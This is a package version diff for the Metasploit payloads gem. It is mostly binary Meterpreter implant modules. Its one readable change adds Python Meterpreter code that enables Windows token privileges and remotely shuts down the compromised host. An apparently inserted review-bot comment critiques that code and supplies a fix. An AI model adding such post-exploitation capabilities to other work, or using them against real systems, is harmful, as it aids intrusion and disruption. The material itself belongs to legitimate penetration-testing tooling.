metasploit-payloads 2.0.97 → 2.0.98

Files changed (76) hide show
  1. checksums.yaml +4 -4
  2. checksums.yaml.gz.sig +0 -0
  3. data/data/android/meterpreter.jar +0 -0
  4. data/data/android/metstage.jar +0 -0
  5. data/data/android/shell.jar +0 -0
  6. data/data/meterpreter/elevator.x64.debug.dll +0 -0
  7. data/data/meterpreter/elevator.x64.dll +0 -0
  8. data/data/meterpreter/elevator.x86.debug.dll +0 -0
  9. data/data/meterpreter/elevator.x86.dll +0 -0
  10. data/data/meterpreter/ext_server_bofloader.x64.debug.dll +0 -0
  11. data/data/meterpreter/ext_server_bofloader.x64.dll +0 -0
  12. data/data/meterpreter/ext_server_bofloader.x86.debug.dll +0 -0
  13. data/data/meterpreter/ext_server_bofloader.x86.dll +0 -0
  14. data/data/meterpreter/ext_server_espia.x64.debug.dll +0 -0
  15. data/data/meterpreter/ext_server_espia.x64.dll +0 -0
  16. data/data/meterpreter/ext_server_espia.x86.debug.dll +0 -0
  17. data/data/meterpreter/ext_server_espia.x86.dll +0 -0
  18. data/data/meterpreter/ext_server_extapi.x64.debug.dll +0 -0
  19. data/data/meterpreter/ext_server_extapi.x64.dll +0 -0
  20. data/data/meterpreter/ext_server_extapi.x86.debug.dll +0 -0
  21. data/data/meterpreter/ext_server_extapi.x86.dll +0 -0
  22. data/data/meterpreter/ext_server_incognito.x64.debug.dll +0 -0
  23. data/data/meterpreter/ext_server_incognito.x64.dll +0 -0
  24. data/data/meterpreter/ext_server_incognito.x86.debug.dll +0 -0
  25. data/data/meterpreter/ext_server_incognito.x86.dll +0 -0
  26. data/data/meterpreter/ext_server_kiwi.x64.debug.dll +0 -0
  27. data/data/meterpreter/ext_server_kiwi.x64.dll +0 -0
  28. data/data/meterpreter/ext_server_kiwi.x86.debug.dll +0 -0
  29. data/data/meterpreter/ext_server_kiwi.x86.dll +0 -0
  30. data/data/meterpreter/ext_server_lanattacks.x64.debug.dll +0 -0
  31. data/data/meterpreter/ext_server_lanattacks.x64.dll +0 -0
  32. data/data/meterpreter/ext_server_lanattacks.x86.debug.dll +0 -0
  33. data/data/meterpreter/ext_server_lanattacks.x86.dll +0 -0
  34. data/data/meterpreter/ext_server_peinjector.x64.debug.dll +0 -0
  35. data/data/meterpreter/ext_server_peinjector.x64.dll +0 -0
  36. data/data/meterpreter/ext_server_peinjector.x86.debug.dll +0 -0
  37. data/data/meterpreter/ext_server_peinjector.x86.dll +0 -0
  38. data/data/meterpreter/ext_server_powershell.x64.debug.dll +0 -0
  39. data/data/meterpreter/ext_server_powershell.x64.dll +0 -0
  40. data/data/meterpreter/ext_server_powershell.x86.debug.dll +0 -0
  41. data/data/meterpreter/ext_server_powershell.x86.dll +0 -0
  42. data/data/meterpreter/ext_server_priv.x64.debug.dll +0 -0
  43. data/data/meterpreter/ext_server_priv.x64.dll +0 -0
  44. data/data/meterpreter/ext_server_priv.x86.debug.dll +0 -0
  45. data/data/meterpreter/ext_server_priv.x86.dll +0 -0
  46. data/data/meterpreter/ext_server_python.x64.debug.dll +0 -0
  47. data/data/meterpreter/ext_server_python.x64.dll +0 -0
  48. data/data/meterpreter/ext_server_python.x86.debug.dll +0 -0
  49. data/data/meterpreter/ext_server_python.x86.dll +0 -0
  50. data/data/meterpreter/ext_server_sniffer.x64.dll +0 -0
  51. data/data/meterpreter/ext_server_sniffer.x86.dll +0 -0
  52. data/data/meterpreter/ext_server_stdapi.py +89 -0
  53. data/data/meterpreter/ext_server_stdapi.x64.debug.dll +0 -0
  54. data/data/meterpreter/ext_server_stdapi.x64.dll +0 -0
  55. data/data/meterpreter/ext_server_stdapi.x86.debug.dll +0 -0
  56. data/data/meterpreter/ext_server_stdapi.x86.dll +0 -0
  57. data/data/meterpreter/ext_server_unhook.x64.debug.dll +0 -0
  58. data/data/meterpreter/ext_server_unhook.x64.dll +0 -0
  59. data/data/meterpreter/ext_server_unhook.x86.debug.dll +0 -0
  60. data/data/meterpreter/ext_server_unhook.x86.dll +0 -0
  61. data/data/meterpreter/ext_server_winpmem.x64.debug.dll +0 -0
  62. data/data/meterpreter/ext_server_winpmem.x64.dll +0 -0
  63. data/data/meterpreter/ext_server_winpmem.x86.debug.dll +0 -0
  64. data/data/meterpreter/ext_server_winpmem.x86.dll +0 -0
  65. data/data/meterpreter/metsrv.x64.debug.dll +0 -0
  66. data/data/meterpreter/metsrv.x64.dll +0 -0
  67. data/data/meterpreter/metsrv.x86.debug.dll +0 -0
  68. data/data/meterpreter/metsrv.x86.dll +0 -0
  69. data/data/meterpreter/screenshot.x64.debug.dll +0 -0
  70. data/data/meterpreter/screenshot.x64.dll +0 -0
  71. data/data/meterpreter/screenshot.x86.debug.dll +0 -0
  72. data/data/meterpreter/screenshot.x86.dll +0 -0
  73. data/lib/metasploit-payloads/version.rb +1 -1
  74. data.tar.gz.sig +0 -0
  75. metadata +2 -2
  76. metadata.gz.sig +1 -3
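--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-metadata.gz: 49f65721e1a9aa745903acaa4c78087d20494cd1cc064e4101ce866eb62eb7fb
-data.tar.gz: be91cc58bcee64d662b1b292fd342f4d7db00a8444edaeaa829011b922c497a3
+metadata.gz: e258521427e2bc71990e2e646fbf617fc70569fc6a1ca41d886eea9a6a5dd9c2
+data.tar.gz: 77d18985a73b5f3e87f77cfb6f15d346b1316e03ea05bde053e23c828aa432f4
 SHA512:
-metadata.gz: 26baf826a30e01d34f7f7cc65d733ff97a0677fa9a315ddc167a3522dae0b56972a8f5ea3963c0765c8e8b398edcbd404720d29bb35b0ae2c380a39c62ca47c0
-data.tar.gz: db20a24fb97fe4b781708c7df06ee2b92f04d0440c7c983b368cafa367fb67c40101a6168d7848f4606f38f119bef7b4de0cca3fcfa65561dcc575f30baa5d6d
+metadata.gz: cee1509b9a8f0780c1d5d02d87f6412a463275d6a72743767c4229115448a86a63e25cddb529cd6e2ee4ea2aa44ecfd7f3b331de74b3b085c35961b45e8fb436
+data.tar.gz: bc60aa01a5781c8a22d78be70fa02665456552fe4fb44c867655ed3e88834f790c3b55c4176d4c1e036bec0a0425b701842f1ab3c3753516f04e0e56aa0970c4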
checksums.yaml.gz.sig CHANGED
Binary file
Binary file
Binary file
Binary file
Binary file
Binary file
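--- a/data/data/meterpreter/ext_server_stdapi.py
+++ b/data/data/meterpreter/ext_server_stdapi.py
@@ -21,6 +21,9 @@ except ImportError:
 has_ctypes = False
 has_windll = False
 
+if has_windll:
+from ctypes import wintypes
+
 try:
 import pty
 has_pty = True
@@ -357,6 +360,36 @@ if has_ctypes:
 ("lpszProxy", ctypes.c_wchar_p),
 ("lpszProxyBypass", ctypes.c_wchar_p)]
 
+class LUID(ctypes.Structure):
+_fields_ = [
+('LowPart', wintypes.DWORD),
+('HighPart', wintypes.LONG)
+]
+
+def __eq__(self, __o):
+return (self.LowPart == __o.LowPart and self.HighPart == __o.HighPart)
+
+def __ne__(self, __o):
+return (self.LowPart != __o.LowPart or self.HighPart != __o.HighPart)
+
+class LUID_AND_ATTRIBUTES(ctypes.Structure):
+_fields_ = [
+('Luid', LUID),
+('Attributes', wintypes.DWORD)
+]
+
+class TOKEN_PRIVILEGES(ctypes.Structure):
+_fields_ = [
+('PrivilegeCount', wintypes.DWORD),
+('Privileges', LUID_AND_ATTRIBUTES * 0),
+]
+def get_array(self):
+array_type = LUID_AND_ATTRIBUTES * self.PrivilegeCount
+return ctypes.cast(self.Privileges, ctypes.POINTER(array_type)).contents
+
+PTOKEN_PRIVILEGES = ctypes.POINTER(TOKEN_PRIVILEGES)
+
+
 #
 # Linux Structures
 #
@@ -999,6 +1032,45 @@ def windll_GetVersion():
 dwBuild = ((dwVersion & 0xffff0000) >> 16)
 return type('Version', (object,), dict(dwMajorVersion = dwMajorVersion, dwMinorVersion = dwMinorVersion, dwBuild = dwBuild))
 
+def enable_privilege(name, enable=True):
+TOKEN_ALL_ACCESS = 0xf01ff
+SE_PRIVILEGE_ENABLED = 0x00000002
+
+GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
+GetCurrentProcess.restype = wintypes.HANDLE
+
+OpenProcessToken = ctypes.windll.advapi32.OpenProcessToken
+OpenProcessToken.argtypes = [wintypes.HANDLE, wintypes.DWORD, ctypes.POINTER(wintypes.HANDLE)]
+OpenProcessToken.restype = wintypes.BOOL
+
+LookupPrivilegeValue = ctypes.windll.advapi32.LookupPrivilegeValueW
+LookupPrivilegeValue.argtypes = [wintypes.LPCWSTR, wintypes.LPCWSTR, ctypes.POINTER(LUID)]
+LookupPrivilegeValue.restype = wintypes.BOOL
+
+AdjustTokenPrivileges = ctypes.windll.advapi32.AdjustTokenPrivileges
+AdjustTokenPrivileges.argtypes = [wintypes.HANDLE, wintypes.BOOL, PTOKEN_PRIVILEGES, wintypes.DWORD, PTOKEN_PRIVILEGES, ctypes.POINTER(wintypes.DWORD)]
+AdjustTokenPrivileges.restype = wintypes.BOOL
+
+token = wintypes.HANDLE()
+success = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, token)
+if not success:
+return False
+
+luid = LUID()
+name = ctypes.create_unicode_buffer(name)
+success = LookupPrivilegeValue(None, name, luid)
+if not success:
+return False
+
+size = ctypes.sizeof(TOKEN_PRIVILEGES)
+size += ctypes.sizeof(LUID_AND_ATTRIBUTES)
+buffer = ctypes.create_string_buffer(size)
+tokenPrivileges = ctypes.cast(buffer, PTOKEN_PRIVILEGES).contents
+tokenPrivileges.PrivilegeCount = 1
+tokenPrivileges.get_array()[0].Luid = luid
+tokenPrivileges.get_array()[0].Attributes = SE_PRIVILEGE_ENABLED if enable else 0
+return AdjustTokenPrivileges(token, False, tokenPrivileges, 0, None, None)
+
 @register_function
 def channel_open_stdapi_fs_file(request, response):
 fpath = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
@@ -1335,6 +1407,23 @@ def stdapi_sys_process_get_processes(request, response):
 return stdapi_sys_process_get_processes_via_ps(request, response)
 return ERROR_FAILURE, response
 
+@register_function_if(has_windll)
+def stdapi_sys_power_exitwindows(request, response):
+SE_SHUTDOWN_NAME = "SeShutdownPrivilege"
+
+flags = packet_get_tlv(request, TLV_TYPE_POWER_FLAGS)['value']
+reason = packet_get_tlv(request, TLV_TYPE_POWER_REASON)['value']
+
+if not enable_privilege(SE_SHUTDOWN_NAME):
+return error_result_windows(), response
+
+ExitWindowsEx = ctypes.windll.user32.ExitWindowsEx
+ExitWindowsEx.argtypes = [ctypes.c_uint32, ctypes.c_ulong]
+ExitWindowsEx.restype = ctypes.c_int8
+if not ExitWindowsEx(flags, reason):
+return error_result_windows(), response
+return ERROR_SUCCESS, response
+
 @register_function_if(has_windll)
 def stdapi_sys_eventlog_open(request, response):
 source_name = packet_get_tlv(request, TLV_TYPE_EVENT_SOURCENAME)['value']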
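Review bot: `enable_privilege` (third hunk, new lines 1035-1073) never closes the token handle it obtains from `OpenProcessToken`, and it returns the raw result of `AdjustTokenPrivileges`, which is nonzero even when the privilege was not assigned — the caller has to check `GetLastError() == ERROR_NOT_ALL_ASSIGNED` (1300) — so `stdapi_sys_power_exitwindows` can proceed believing SeShutdownPrivilege is held when it is not, and the later `ExitWindowsEx` failure is reported with a less specific error. The token is also opened with `TOKEN_ALL_ACCESS` although `TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY` (0x0028) is all this function needs. In the fourth hunk, `ExitWindowsEx.restype = ctypes.c_int8` truncates a 32-bit BOOL; `wintypes.BOOL`, already imported by the first hunk, is the correct type. I also cannot see `TLV_TYPE_POWER_FLAGS` and `TLV_TYPE_POWER_REASON` defined anywhere in this diff; if they are not already present elsewhere in the file, the handler raises NameError before reaching the shutdown call.
```python
def enable_privilege(name, enable=True):
    TOKEN_ADJUST_PRIVILEGES = 0x0020
    TOKEN_QUERY = 0x0008
    SE_PRIVILEGE_ENABLED = 0x00000002
    ERROR_NOT_ALL_ASSIGNED = 1300

    # … unchanged: GetCurrentProcess / OpenProcessToken / LookupPrivilegeValue / AdjustTokenPrivileges prototypes …
    CloseHandle = ctypes.windll.kernel32.CloseHandle
    CloseHandle.argtypes = [wintypes.HANDLE]
    CloseHandle.restype = wintypes.BOOL

    token = wintypes.HANDLE()
    if not OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, token):
        return False
    try:
        # … unchanged: LookupPrivilegeValue lookup and TOKEN_PRIVILEGES buffer setup …
        if not AdjustTokenPrivileges(token, False, tokenPrivileges, 0, None, None):
            return False
        # A nonzero return only means the call was accepted; a privilege missing
        # from the token is reported separately as ERROR_NOT_ALL_ASSIGNED.
        return ctypes.GetLastError() != ERROR_NOT_ALL_ASSIGNED
    finally:
        CloseHandle(token)
```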
Binary file
Binary file
Binary file
Binary file
Binary file
Binary file
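--- a/data/lib/metasploit-payloads/version.rb
+++ b/data/lib/metasploit-payloads/version.rb
@@ -1,6 +1,6 @@
 # -*- coding:binary -*-
 module MetasploitPayloads
-VERSION = '2.0.97'
+VERSION = '2.0.98'
 
 def self.version
 VERSION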
data.tar.gz.sig CHANGED
Binary file
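--- a/metadata
+++ b/metadata
@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: metasploit-payloads
 version: !ruby/object:Gem::Version
-version: 2.0.97
+version: 2.0.98
 platform: ruby
 authors:
 - OJ Reeves
@@ -96,7 +96,7 @@ cert_chain:
 EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
 9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
 -----END CERTIFICATE-----
-date: 2022-09-29 00:00:00.000000000 Z
+date: 2022-11-03 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
 name: rake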
metadata.gz.sig CHANGED
@@ -1,3 +1 @@
1
- jA����AXoX.�p��Ao�:�9��UG����"+/P��Rg��>��jy۱"1Q
2
- L������o.���5;�G�5�u����S
3
- ��6l�7~���3�{��DUHՃ ��d6Yn���R���7��Li�SO�I��̡�p�8��5L��~p,����3�Ff�7��$���n57
1
+ ��SIg}%��~҂�9[8~V�i��ى�&b��B_`Q)(W��&��Q���ը��;�0i��d䗿ΠL�Y�\����C%�J��J6<�d�'�Trh��5�)��<�L�|���